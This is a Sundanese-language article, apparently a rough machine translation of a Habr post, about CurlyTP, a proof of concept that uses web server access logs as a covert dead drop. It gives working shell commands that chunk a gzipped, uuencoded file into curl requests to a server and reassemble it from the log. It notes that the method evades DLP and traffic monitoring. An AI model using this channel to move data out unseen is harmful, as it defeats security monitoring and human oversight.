Numutkeun definisi Wikipedia, serelek paéh mangrupikeun alat konspirasi anu fungsina pikeun tukeur inpormasi atanapi sababaraha barang antara jalma anu nganggo lokasi rahasia. Gagasanna nyaéta jalma-jalma henteu pernah pendak - tapi aranjeunna tetep tukeur inpormasi pikeun ngajaga kasalametan operasional.

Tempat nyumput teu matak narik perhatian. Ku alatan éta, di dunya offline aranjeunna mindeng ngagunakeun hal wijaksana: bata leupas dina témbok, buku perpustakaan, atawa kerung dina tangkal.

Aya seueur alat enkripsi sareng anonimisasi dina Internét, tapi kanyataanna ngagunakeun alat ieu narik perhatian. Salaku tambahan, aranjeunna tiasa diblokir di tingkat perusahaan atanapi pamaréntah. Naon anu kedah dilakukeun?

Pamekar Ryan Flowers ngajukeun pilihan anu pikaresepeun - nganggo server wéb naon waé salaku tempat nyumput. Upami anjeun mikirkeun éta, naon anu dilakukeun ku pangladén wéb? Narima pamundut, ngaluarkeun file sareng nyerat log. Sareng log sadaya pamundut, malah lepat!

Tétéla yén server wéb mana waé ngamungkinkeun anjeun pikeun nyimpen ampir sadaya pesen dina log. Kembang wondered kumaha ngagunakeun ieu.

Anjeunna nawiskeun pilihan ieu:

1. Candak file téks (pesen rusiah) jeung ngitung Hash (md5sum).
2. Urang encode eta (gzip+uuencode).
3. Urang nulis log ngagunakeun pamundut ngahaja lepat ka server.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Pikeun maca file, anjeun kedah ngalakukeun operasi ieu dina urutan sabalikna: decode sareng unzip file, pariksa hash (hash tiasa aman dikirimkeun dina saluran anu kabuka).

Spasi diganti ku =+=supados henteu aya spasi dina alamatna. Program éta, anu disebat ku panulis CurlyTP, ngagunakeun encoding base64, sapertos lampiran email. Paménta didamel nganggo kecap konci ?transfer?ku kituna panarima bisa kalayan gampang manggihan eta dina log.

Naon anu urang tingali dina log dina hal ieu?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Sakumaha anu parantos disebatkeun, pikeun nampi pesen rusiah anjeun kedah ngalakukeun operasi dina urutan sabalikna:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Prosésna gampang pikeun ngajadikeun otomatis. Md5sum cocog, sarta eusi file mastikeun yén sagalana ieu decoded neuleu.

Metoda basajan pisan. "Tujuan latihan ieu ngan ukur ngabuktikeun yén file tiasa ditransfer ngaliwatan pamundut wéb anu polos, sareng tiasa dianggo dina server wéb anu nganggo log téks polos. Intina, unggal server wéb mangrupikeun tempat nyumput!” nyerat Kembang.

Tangtosna, metodeu ngan ukur tiasa dianggo upami panampi ngagaduhan aksés kana log server. Tapi aksés sapertos ieu disayogikeun, contona, ku seueur hosters.

Kumaha ngagunakeunana?

Ryan Kembang nyatakeun yén anjeunna sanés ahli kaamanan inpormasi sareng moal nyusun daptar kamungkinan panggunaan CurlyTP. Pikeun anjeunna, éta ngan ukur bukti konsép yén alat anu biasa anu urang tingali unggal dinten tiasa dianggo dina cara anu henteu konvensional.

Kanyataanna, metoda ieu ngabogaan sajumlah kaunggulan leuwih server séjén "hides" kawas Digital Dead serelek atawa PirateBox: teu merlukeun konfigurasi husus dina sisi server atawa protokol husus - sarta moal ngahudangkeun kacurigaan diantara maranéhanana anu ngawas lalulintas. Teu mungkin yén sistem SORM atanapi DLP bakal nyeken URL pikeun file téks anu dikomprés.

Ieu mangrupikeun salah sahiji cara pikeun ngirim pesen ngalangkungan file jasa. Anjeun tiasa apal kumaha sababaraha pausahaan canggih dipaké pikeun nempatkeun Proyék pamekar di HTTP Headers atawa dina kode kaca HTML.

Gagasan éta ngan ukur pamekar wéb anu bakal ningali endog Paskah ieu, sabab jalma normal henteu ningali header atanapi kode HTML.

sumber: www.habr.com